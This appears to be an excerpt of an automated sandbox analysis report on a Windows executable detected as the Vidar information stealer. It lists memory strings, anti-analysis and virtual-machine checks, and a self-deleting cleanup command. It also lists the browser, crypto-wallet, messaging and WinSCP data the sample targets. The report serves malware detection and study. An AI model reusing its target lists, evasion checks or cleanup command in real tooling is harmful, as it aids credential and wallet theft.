          Source: dZKPE9gotO.exe, 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: BABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
          Source: dZKPE9gotO.exeBinary or memory string: SBIEDLL.DLL
          Source: dZKPE9gotO.exeBinary or memory string: API_LOG.DLL
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-14873
          Source: C:\Windows\SysWOW64\timeout.exe TID: 8236Thread sleep count: 88 > 30
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0040DE0C FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040DE0C
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00401825 EntryPoint,FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401825
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0040CCF2 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040CCF2
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0040B942 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,FindNextFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,0_2_0040B942
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0040D820 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040D820
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C92FC GetProcessHeap,FindFirstFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_009C92FC
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009CAE0D SHGetFolderPathA,wsprintfA,FindFirstFileA,strcmp,strcmp,_mbscpy,_splitpath,_mbscpy,strlen,isupper,wsprintfA,_mbscpy,strlen,SHFileOperation,FindClose,0_2_009CAE0D
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C986A FindFirstFileA,StrCmpCA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009C986A
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C8952 FindFirstFileA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009C8952
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C42CC GetSystemInfo,0_2_009C42CC
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
          Source: dZKPE9gotO.exe, 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 12.1e411cf62bcba04d74fc6b505b9235404INSERT_KEY_HEREGetProcALoadLibrlstrcatAOpenEvenCreateEvCloseHanVirtualAllocExNuVirtualFGetSysteVirtualAHeapAlloGetComputerNameAlstrcpyAGetProceGetCurrentProceslstrlenAExitProcSystemTimeToFileadvapi32gdi32.dluser32.dcrypt32.ntdll.dlGetUserNCreateDCGetDevicReleaseDVMwareVMJohnDoe%hu/%hu/GetEnvironmentVariableAGetFileAttributeGlobalLoHeapFreeGetFileSGlobalSiIsWow64PProcess3GetLocalFreeLibrGetTimeZoneInforGetSystemPowerStGetWindowsDirectGetModuleFileNamDeleteFiFindNextLocalFreFindClosSetEnvironmentVaLocalAllReadFileSetFilePWriteFilCreateFiFindFirsCopyFileVirtualPGetLastElstrcpynMultiByteToWideCGlobalFrWideCharToMultiBGlobalAlOpenProcTerminateProcessgdiplus.ole32.dlbcrypt.dwininet.shlwapi.shell32.psapi.dlrstrtmgrCreateCompatibleSelectObDeleteObGdiplusSGdiplusShutdownGdipSaveImageToSGdipDisposeImageGdipFreeGetHGlobalFromStCreateStreamOnHGCoUninitCoInitiaCoCreateInstanceBCryptDeBCryptSetPropertBCryptDestroyKeyGetWindoGetDesktopWindowCloseWinwsprintfEnumDisplayDevicGetKeyboardLayouCharToOeRegQueryValueExARegEnumKRegOpenKRegCloseRegEnumVCryptBinaryToStrSHGetFolderPathAShellExecuteExAInternetOpenUrlAInternetConnectAInternetCloseHanInternetHttpSendRequestAHttpOpenRequestAInternetReadFileInternetCrackUrlStrCmpCAStrStrAStrCmpCWPathMatcRmStartSRmRegisterResourRmGetLisRmEndSessqlite3_sqlite3_prepare_sqlite3_column_tsqlite3_finalizesqlite3_column_bencrypteNSS_InitNSS_ShutPK11_GetInternalKeySlotPK11_FrePK11_AuthenticatPK11SDR_DecryptC:\ProgramData\profile:Login: PasswordOperaGXNetworkCookiesAutofillHistoryMonth: Login DaWeb Datalogins.jformSubmusernameencryptedUsernamencryptedPassworcookies.places.sPluginsSync Extension SettingsIndexedDOpera StOpera GX StableCURRENTchrome-extension_0.indexeddb.levLocal StprofilesfirefoxWallets%08lX%04ProductN%d/%d/%d %d:%d:%DisplayNDisplayVfreebl3.mozglue.msvcp140nss3.dllsoftokn3vcruntime140.dll/c start%DESKTOP%APPDATA%LOCALAP%USERPRO%DOCUMEN%PROGRAM%PROGRAMFILES_86%RECENT%\discord\Local Storage\l\Telegram Desktokey_dataD877F783D5D3EF8CA7FDF864FBC10B77A92DAA6EA6F891F2F8806DD0C461824FTelegram\.purpleaccountsdQw4w9Wgtoken: Software\Valve\SSteamPat\config\config.vDialogConfig.vdflibraryfolders.vloginuse\Steam\sqlite3.browsers\Discord\tokens.HTTP/1.1file_nammessagescreensh
          Source: Amcache.hve.30.drBinary or memory string: VMware
          Source: OPHDT2.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
          Source: dZKPE9gotO.exe, 00000000.00000002.2205161223.0000000000A6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
          Source: OPHDT2.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
          Source: OPHDT2.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
          Source: OPHDT2.0.drBinary or memory string: outlook.office.comVMware20,11696492231s
          Source: OPHDT2.0.drBinary or memory string: AMC password management pageVMware20,11696492231
          Source: Amcache.hve.30.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: dZKPE9gotO.exe, 00000000.00000003.1347088597.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000002.2205161223.0000000000AA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWt
          Source: OPHDT2.0.drBinary or memory string: interactivebrokers.comVMware20,11696492231
          Source: OPHDT2.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
          Source: dZKPE9gotO.exe, 00000000.00000003.1347088597.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000002.2205161223.0000000000AA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: OPHDT2.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
          Source: OPHDT2.0.drBinary or memory string: outlook.office365.comVMware20,11696492231t
          Source: Amcache.hve.30.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: OPHDT2.0.drBinary or memory string: discord.comVMware20,11696492231f
          Source: Amcache.hve.30.drBinary or memory string: vmci.sys
          Source: OPHDT2.0.drBinary or memory string: global block list test formVMware20,11696492231
          Source: chrome.exe, 0000000A.00000002.1563298280.00007824028F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=4964dfca-7e6f-4cd5-80d7-3178a81a3dc2
          Source: OPHDT2.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
          Source: OPHDT2.0.drBinary or memory string: bankofamerica.comVMware20,11696492231x
          Source: OPHDT2.0.drBinary or memory string: tasks.office.comVMware20,11696492231o
          Source: Amcache.hve.30.drBinary or memory string: VMware20,1
          Source: Amcache.hve.30.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.30.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.30.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: dZKPE9gotO.exe, 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMwareVMware
          Source: OPHDT2.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
          Source: Amcache.hve.30.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.30.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.30.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: OPHDT2.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
          Source: Amcache.hve.30.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.30.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.30.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: OPHDT2.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
          Source: Amcache.hve.30.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
          Source: OPHDT2.0.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
          Source: OPHDT2.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
          Source: OPHDT2.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
          Source: Amcache.hve.30.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: OPHDT2.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
          Source: Amcache.hve.30.drBinary or memory string: VMware Virtual USB Mouse
          Source: OPHDT2.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
          Source: Amcache.hve.30.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.30.drBinary or memory string: VMware, Inc.
          Source: Amcache.hve.30.drBinary or memory string: VMware20,1hbin@
          Source: Amcache.hve.30.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: OPHDT2.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
          Source: Amcache.hve.30.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.30.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: dZKPE9gotO.exeBinary or memory string: MwareVMware
          Source: msedge.exe, 0000000D.00000003.1609890374.0000399802550000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
          Source: OPHDT2.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
          Source: OPHDT2.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
          Source: OPHDT2.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
          Source: Amcache.hve.30.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.30.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: chrome.exe, 0000000A.00000002.1546857682.000001CC68DFB000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000D.00000002.1678570506.00000168C3C45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: OPHDT2.0.drBinary or memory string: dev.azure.comVMware20,11696492231j
          Source: OPHDT2.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
          Source: Amcache.hve.30.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.30.drBinary or memory string: \driver\vmci,\driver\pci
          Source: OPHDT2.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
          Source: dZKPE9gotO.exe, 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVM
          Source: Amcache.hve.30.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.30.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: OPHDT2.0.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
          Source: OPHDT2.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeAPI call chain: ExitProcess graph end nodegraph_0-14854
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeAPI call chain: ExitProcess graph end nodegraph_0-14923
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeAPI call chain: ExitProcess graph end nodegraph_0-15431
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009CC858 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009CC858
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00401325 mov eax, dword ptr fs:[00000030h]0_2_00401325
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00401325 mov eax, dword ptr fs:[00000030h]0_2_00401325
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00401325 mov eax, dword ptr fs:[00000030h]0_2_00401325
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00401325 mov eax, dword ptr fs:[00000030h]0_2_00401325
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00401325 mov eax, dword ptr fs:[00000030h]0_2_00401325
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00401325 mov eax, dword ptr fs:[00000030h]0_2_00401325
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_004012DC test dword ptr fs:[00000030h], 00000068h0_2_004012DC
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_004012ED mov eax, dword ptr fs:[00000030h]0_2_004012ED
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_004012BE mov eax, dword ptr fs:[00000030h]0_2_004012BE
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B0D90 mov eax, dword ptr fs:[00000030h]0_2_009B0D90
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B158C mov eax, dword ptr fs:[00000030h]0_2_009B158C
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B158C mov eax, dword ptr fs:[00000030h]0_2_009B158C
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B158C mov eax, dword ptr fs:[00000030h]0_2_009B158C
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B158C mov eax, dword ptr fs:[00000030h]0_2_009B158C
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B158C mov eax, dword ptr fs:[00000030h]0_2_009B158C
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B158C mov eax, dword ptr fs:[00000030h]0_2_009B158C
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B092B mov eax, dword ptr fs:[00000030h]0_2_009B092B
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B1525 mov eax, dword ptr fs:[00000030h]0_2_009B1525
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B1554 mov eax, dword ptr fs:[00000030h]0_2_009B1554
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B1543 test dword ptr fs:[00000030h], 00000068h0_2_009B1543
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A29C23 push dword ptr fs:[00000030h]0_2_00A29C23
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00401458 HeapAlloc,GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,0_2_00401458

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Searches for specific processes (likely to inject)
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_004152A5 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_004152A5
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C5468 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_009C5468
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C550C CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_009C550C
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HLXLFCBI" & exitJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_009C413E
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0041FC76 GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0041FC76
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00413D91 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00413D91
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C40BB GetProcessHeap,GetTimeZoneInformation,0_2_009C40BB
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: Amcache.hve.30.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.30.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.30.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.30.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
          Source: Amcache.hve.30.drBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Yara detected Vidar stealer
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dZKPE9gotO.exe PID: 2000, type: MEMORYSTR
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: dZKPE9gotO.exeString found in binary or memory: \Electrum\wallets\
          Source: dZKPE9gotO.exeString found in binary or memory: \ElectronCash\wallets\
          Source: dZKPE9gotO.exeString found in binary or memory: \Electrum\wallets\
          Source: dZKPE9gotO.exeString found in binary or memory: window-state.json
          Source: dZKPE9gotO.exeString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco
          Source: dZKPE9gotO.exeString found in binary or memory: \Exodus\
          Source: dZKPE9gotO.exeString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco
          Source: dZKPE9gotO.exeString found in binary or memory: ElectrumLTC
          Source: dZKPE9gotO.exeString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco
          Source: dZKPE9gotO.exeString found in binary or memory: \Ethereum\
          Source: dZKPE9gotO.exeString found in binary or memory: \Exodus\
          Source: dZKPE9gotO.exeString found in binary or memory: Ethereum
          Source: dZKPE9gotO.exeString found in binary or memory: \Coinomi\Coinomi\wallets\
          Source: dZKPE9gotO.exeString found in binary or memory: \Exodus\exodus.wallet\
          Source: dZKPE9gotO.exeString found in binary or memory: MultiDoge
          Source: dZKPE9gotO.exeString found in binary or memory: seed.seco
          Source: dZKPE9gotO.exeString found in binary or memory: keystore
          Source: dZKPE9gotO.exeString found in binary or memory: \Electrum-LTC\wallets\
          Tries to harvest and steal Bitcoin Wallet information
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\default\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\tmp\key4.dbJump to behavior
